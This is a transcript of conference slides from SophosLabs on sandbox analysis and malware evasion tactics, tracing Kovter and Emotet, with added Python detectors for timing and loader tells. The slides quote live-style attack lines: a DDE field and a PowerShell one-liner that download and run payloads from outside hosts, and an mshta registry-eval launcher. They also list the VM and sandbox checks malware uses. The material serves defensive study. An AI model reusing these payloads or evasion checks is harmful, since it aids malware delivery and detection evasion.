#RSAC Session AIR-F03: PLAYING GAMES IN THE SANDBOX - DYNAMIC ANALYSIS AND MODERN EVASION TACTICS
Michael Wood, Senior Manager, Dynamic Protection, SophosLabs, Sophos

Upload: dangdan

Post on 11-Jun-2018


TRANSCRIPT

  • Title slide (#RSAC, session AIR-F03): Playing Games in the Sandbox: Dynamic Analysis and Modern Evasion Tactics. Michael Wood, Senior Manager, Dynamic Protection, SophosLabs, Sophos.

  • Cloud Sandbox

    Diagram labels: Internet, Sandbox, Known Good, Execute, Known Bad?

  • What is a Cloud Sandbox useful for?

    Malware comes in all shapes and sizes:
    o Windows executables
    o Office & PDF documents
    o Scripts, Java, Windows Shortcuts
    o Zip, Tar, Rar, & archives

    Detect 0-day threats based on behavior

  • Example: 0-day DDE exploit

    Intended use (spreadsheet data link):

    { DDEAUTO excel "C:\\My Documents\\Profits.xls" "Sheet1!R1C1:R4C4" \p }

    Exploited use (malware download):

    { DDEAUTO cmd.exe /k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader((([Net.WebRequest]::Create([System.Uri]'http://redacted[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1 }

  • What is a Cloud Sandbox useful for? (continued)

    Detect 0-day threats based on behavior

    But what if the threat behaves differently in the Sandbox?

  • Evasive threats

    IF is_sandbox() THEN
        something_good()
    ELSE
        something_bad()

  • is_sandbox()

    Anti-VM: artifacts (files, registry keys, drivers, disk/CPU names); behavior (CPU behavior)
    Anti-sandbox: artifacts (tools or scripts, realistic hardware); behavior (human-like activity)
    Timing: explicit delay (Sleep()); implicit delay (user interaction required)

  • something_good()

    ExitProcess(), loop forever, self delete

  • IN THE WILD

  • Kovter Malware

    Run key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    mshta.exe javascript: W9N=new ActiveXObject("WScript.Shell"); ztJ4n7=W9N.RegRead("HKCU\\software\\4a9e7b11c0\\6bee3829"); eval(ztJ4n7);

  • Kovter VM Evasion Tests

    Running processes: VBoxService.exe, VMwareUser.exe
    Registry keys: HARDWARE\\ACPI\\DSDT\\VBOX__, HKLM\\SOFTWARE\\VMWare, Inc.
    Other artifacts: \\.\vmmemctl, PIPE, VMwareCopyPasteSetClipboard event

  • CPUID - Artifacts

    Bare metal: CPUID Vendor -> GenuineIntel; CPUID Hypervisor -> 0x0
    Virtual machine: CPUID Vendor -> KVMKVMKVM; CPUID Hypervisor -> 0x80000000

  • CPUID - Timing

    Figure: timestamps t1 and t2 are taken around a CPUID instruction and their difference is the CPUID cost (labels: CPUID, GenuineIntel, t1, t2, CPUID cost).

  • Slide 14 (chart): axes labelled Evasive Activity and Legitimacy.

  • ACTIVE EVASIONS

  • Document Malware

  • Macro Evasion: Realistic Filename

    Is my file name only hexadecimal characters?

  • Macro Evasion: Realistic History

    Are there fewer than 3 recently used files?

  • Macro Evasion: Blacklist Processes

    Are there any VM or analysis tools running?

  • Macro Evasion: GEO IP

    Does the GEO IP match my target?

  • Leverage #1 - Protection

    is_sandbox() == something_bad()

  • Leverage #2 - Bypass

    Does C:\B78AE926 exist?
    No: Run evasions
    Yes: Run malware

  • Leverage #3 - Vaccination

    is_sandbox() == TRUE

  • PASSIVE EVASIONS

  • Documents: Some Clicks Required

  • Explicit Delay

    Timeline labels: Time: 0 min, Time: 2 min, Time: 5 min; Sandbox Analysis

    powershell sleep 300;new-object system.net.webclient.downloadfile). Invoke('https://malware.biz/foo',%TEMP%\Local.exe')& start-process %TEMP%\Local.exe'"

  • Implicit Delay: Busy work

    FOR i=0; i < 500,000; i++ DO
        IsDebuggerPresent()
    END FOR

    Chart labels: Bare Metal, Virtual Machine, Sandbox

  • Typical Human Input

    GetLastInputInfo(), GetCursorPos()
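As an added example (not from the talk and not Sophos code), here is how a sandbox operator could surface the three timing tells from the Explicit Delay, Busy work and Typical Human Input slides: it parses a launcher command line for PowerShell sleeps and counts busy-work and input-polling APIs in a call trace. The command line, the trace, the thresholds and the 120-second analysis budget are all constructed assumptions.

```python
import re
from collections import Counter

# Constructed inputs, not taken from the talk. CMDLINE has the shape of the
# explicit-delay launcher on the slide, with a placeholder URL and path.
CMDLINE = ("powershell sleep 300;(new-object system.net.webclient).downloadfile("
           "'https://malware.invalid/foo','C:\\Temp\\Local.exe');start-process C:\\Temp\\Local.exe")

# Constructed API-call trace, one "Api(arg)" string per call, as a sandbox would log it.
TRACE = (["IsDebuggerPresent()"] * 500_000               # implicit delay: busy work
         + ["GetLastInputInfo()", "GetCursorPos()"] * 3  # waiting for a human to show up
         + ["CreateFileA(C:\\Temp\\Local.exe)"])

SLEEP_RE = re.compile(r"(?i)\b(?:start-)?sleep\b\s*(?:-(m(?:illiseconds)?|s(?:econds)?)\s*)?(\d+)")
BUSY_APIS = {"IsDebuggerPresent", "GetTickCount", "QueryPerformanceCounter"}
INPUT_APIS = {"GetLastInputInfo", "GetCursorPos"}

def explicit_delay_seconds(cmdline: str) -> float:
    """Total seconds of PowerShell sleep a launcher requests before acting."""
    total = 0.0
    for unit, value in SLEEP_RE.findall(cmdline):
        total += int(value) / 1000 if unit.lower().startswith("m") else int(value)
    return total

def timing_tells(trace, busy_threshold=10_000, poll_threshold=2):
    """Return {api: count} for busy-work loops and human-input polling that
    cross a threshold; each is a reason to extend the run or inject input."""
    counts = Counter(call.split("(", 1)[0] for call in trace)
    return {api: n for api, n in counts.items()
            if (api in BUSY_APIS and n >= busy_threshold)
            or (api in INPUT_APIS and n >= poll_threshold)}

def verdict(cmdline, trace, analysis_budget_s=120):
    """Combine both signals into a list of human-readable evasion tells."""
    reasons = []
    delay = explicit_delay_seconds(cmdline)
    if delay > analysis_budget_s:
        reasons.append(f"explicit delay of {delay:.0f}s exceeds the {analysis_budget_s}s budget")
    tells = timing_tells(trace)
    if any(api in BUSY_APIS for api in tells):
        reasons.append("busy-work loop (implicit delay)")
    if any(api in INPUT_APIS for api in tells):
        reasons.append("polls for human input before acting")
    return reasons

if __name__ == "__main__":
    for reason in verdict(CMDLINE, TRACE):
        print("evasion tell:", reason)
```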

  • File Structure

    > unzip -l IMAGES.ZIP
       Length      Date    Time    Name
    ---------  ---------- -----   ----
       518144  2018-01-17 02:17   IMG_1715.jpg

  • EVASIVE TIMELINE: EMOTET

  • Emotet Delivery: Some Clicks Required

  • Emotet: Custom Loader

    Jul 2017 (decrypts in place): Packed EXE -> decrypt -> Emotet EXE
    Aug 2017 (loader added): Packed EXE -> decrypt -> Loader EXE -> Emotet EXE

  • Emotet: Oct 2017, is_sandbox() v1

    Diagram: the Loader EXE runs the evasions (is_sandbox) before the Emotet EXE.

    Values is_sandbox() checks for:
    File names: sample.exe, artifact.exe
    Names: John Doe; TEQUILABOOMBOOM; Wilbert / SC; admin / SystemIT
    Paths: C:\123\email.doc, C:\email.htm, C:\email.doc

  • Emotet: Loader In-Memory Obfuscation

    Diagram: Emotet EXE, Loader EXE (busy work, evasions), Stolen Code

    1. New memory region for stolen instructions
    2. Steal instructions from EXE, patch in detour to busy work routine

  • Emotet: Dec 2017, is_sandbox() v2

    Loader Evasions V1
    String comparisons tested via lstrcmpA API
    File existence tested via CreateFileA API
    Sandbox detected => ExitProcess()

    Loader Evasions V2
    String comparisons: inline strcmp function, no API
    File existence: full file system enumeration via FindFirstFile API
    Sandbox detected => repeat evasion tests, infinitely

    Callouts (shown as builds of this slide):
    Hide sensitive strings, like TEQUILABOOMBOOM; queries for sensitive data remain
    Hide sensitive strings, like sample.exe; huge increase in file system inspection activity
    Avoid bailout tell; repeated increase in file system inspection activity
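An added example, not from the talk or from any Sophos tooling, of scoring the V1 and V2 loader tells from this slide out of an API-call trace: V1 shows up as lstrcmpA/CreateFileA arguments that match the sandbox profile values listed on the Oct 2017 slide followed by ExitProcess, V2 as repeated FindFirstFile/FindNextFile bursts with no exit. The traces are constructed, GetUserNameA is an assumed stand-in for the unnamed "query for sensitive data", and the burst threshold is an assumption.

```python
# Sandbox profile values the slides list as Emotet's comparison targets.
SANDBOX_STRINGS = {"John Doe", "TEQUILABOOMBOOM", "Wilbert", "SC", "admin", "SystemIT",
                   "sample.exe", "artifact.exe",
                   r"C:\123\email.doc", r"C:\email.htm", r"C:\email.doc"}
CHECK_APIS = {"lstrcmpA", "CreateFileA"}         # v1 checks go through these APIs
ENUM_APIS = {"FindFirstFileA", "FindNextFileA"}  # v2 walks the file system instead

def enumeration(n):
    """Constructed trace fragment: one directory walk of n calls."""
    return [("FindFirstFileA", r"C:\*")] + [("FindNextFileA", "")] * (n - 1)

# Constructed (api, arg) traces, not real captures. GetUserNameA stands in for the
# "query for sensitive data" the slide says remains; the slide does not name the API.
V1_TRACE = [("GetUserNameA", ""), ("lstrcmpA", "John Doe"), ("lstrcmpA", "TEQUILABOOMBOOM"),
            ("CreateFileA", r"C:\123\email.doc"), ("ExitProcess", "0")]
V2_TRACE = ([("GetUserNameA", "")] + enumeration(1500) + [("Sleep", "1000")]
            + enumeration(1500) + [("Sleep", "1000")] + enumeration(1500))
BENIGN_TRACE = [("CreateFileA", r"C:\Users\me\report.docx"), ("WriteFile", "")]

def enum_bursts(apis):
    """Lengths of maximal runs of consecutive FindFirstFile/FindNextFile calls."""
    bursts, run = [], 0
    for api in apis:
        if api in ENUM_APIS:
            run += 1
        elif run:
            bursts.append(run)
            run = 0
    return bursts + [run] if run else bursts

def loader_tells(trace, enum_threshold=1000):
    """Score a trace for the v1 (API-visible checks, then bailout) and
    v2 (enumeration bursts that repeat instead of exiting) loader tells."""
    apis = [api for api, _ in trace]
    tells = []
    hits = [arg for api, arg in trace if api in CHECK_APIS and arg in SANDBOX_STRINGS]
    if hits:
        tells.append(f"v1: {len(hits)} checks against sandbox artifacts via API")
        if "ExitProcess" in apis:
            tells.append("v1: bailout via ExitProcess")
    bursts = [b for b in enum_bursts(apis) if b >= enum_threshold]
    if bursts:
        tells.append(f"v2: {len(bursts)} file system enumeration burst(s), largest {max(bursts)} calls")
        if len(bursts) > 1 and "ExitProcess" not in apis:
            tells.append("v2: enumeration repeats without exit: evasion loop, not bailout")
    return tells

if __name__ == "__main__":
    for name, trace in [("v1", V1_TRACE), ("v2", V2_TRACE), ("benign", BENIGN_TRACE)]:
        print(name, loader_tells(trace))
```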

  • Emotet: Jan 2018, Evasion Fragments

    is_sandbox() disabled, but fragments remain:

    Dec 2017: TEQUILABOOMBOOM, SystemIT, John Doe
    Jan 2018: T E Q U I L A B O O M B O O M, S y s t e m I T, Aller Doe
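As an added example (not from the talk), a scanner for the leftover profile strings on this slide: the Jan 2018 forms are spaced out the way a wide (UTF-16LE) string looks in a strings dump, and one is mangled to "Aller Doe", so the scanner looks for each fragment in ASCII and UTF-16LE and falls back to the longest surviving suffix. The sample bytes are constructed and the min_len cutoff is an assumption.

```python
# Profile strings the slide shows surviving as fragments after is_sandbox() was disabled.
FRAGMENTS = ["TEQUILABOOMBOOM", "SystemIT", "John Doe"]

def encodings(s: str) -> dict:
    """ASCII and UTF-16LE byte forms; a strings dump of the wide form reads 'T E Q U I L A'."""
    return {"ascii": s.encode("ascii"), "utf16le": s.encode("utf-16-le")}

def scan_fragments(blob: bytes, fragments=FRAGMENTS, min_len=3) -> dict:
    """Map each fragment to [(encoding, offset, matched_text)] found in blob.

    A whole-string hit is reported first; otherwise the longest suffix of at
    least min_len characters is searched, so a mangled 'Aller Doe' still
    surfaces as the tail of 'John Doe'. An empty dict means no fragments."""
    found = {}
    for frag in fragments:
        for enc, needle in encodings(frag).items():
            off = blob.find(needle)
            if off >= 0:
                found.setdefault(frag, []).append((enc, off, frag))
                continue
            for cut in range(1, len(frag) - min_len + 1):
                tail = frag[cut:]
                off = blob.find(encodings(tail)[enc])
                if off >= 0:
                    found.setdefault(frag, []).append((enc, off, tail))
                    break
    return found

# Constructed sample bytes (not a real Emotet dump): a wide TEQUILABOOMBOOM, an
# ASCII SystemIT, and a wide "Aller Doe" standing in for the damaged John Doe.
SAMPLE = (b"\x00" * 8 + "TEQUILABOOMBOOM".encode("utf-16-le") + b"\x00\x00"
          + b"SystemIT" + b"\x00" + "Aller Doe".encode("utf-16-le") + b"\x90" * 4)

if __name__ == "__main__":
    for frag, hits in scan_fragments(SAMPLE).items():
        for enc, off, text in hits:
            print(f"{frag!r}: {enc} at offset {off}, matched {text!r}")
```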

  • Emotet: Feb 2018, Evasion Retraction

    Diagram: Emotet EXE, Loader EXE (Stolen Code, busy work, evasions)

  • Emotet Evasive Tactic Timeline

    Jul 2017: Busy work
    Aug 2017: Loader module
    Oct 2017: is_sandbox v1
    Dec 2017: is_sandbox v2, something_good v2
    Jan 2018: is_sandbox off, fragments remain
    Feb 2018: is_sandbox removed

  • TAKEAWAYS

  • Summary

    Leverage: is_sandbox() == something_bad()
    Battle ground: infinitely many tactics, equally many defenses
    Raise the bar: attacks require greater depth & complexity

  • Predictions

    Virtual machine tactics - expect decline: existing mitigations, assets in the cloud
    Human-like behavior - expect growth: real user activity, victim profiling
    Avoid detonation - expect growth: dodge execution in the Sandbox altogether

  • Actions: Engage, Familiarize, Experiment

    Engage: security partners' approach to evasive threats
    Familiarize: open-source tools to test anti-sandbox tactics
    Experiment: deploy your own open-source sandbox

    PAFish Tool: https://github.com/a0rtega/pafish
    Al-Khaser Tool: https://github.com/LordNoteworthy/al-khaser
    Cuckoo Sandbox: https://cuckoosandbox.org/

  • THANK YOU
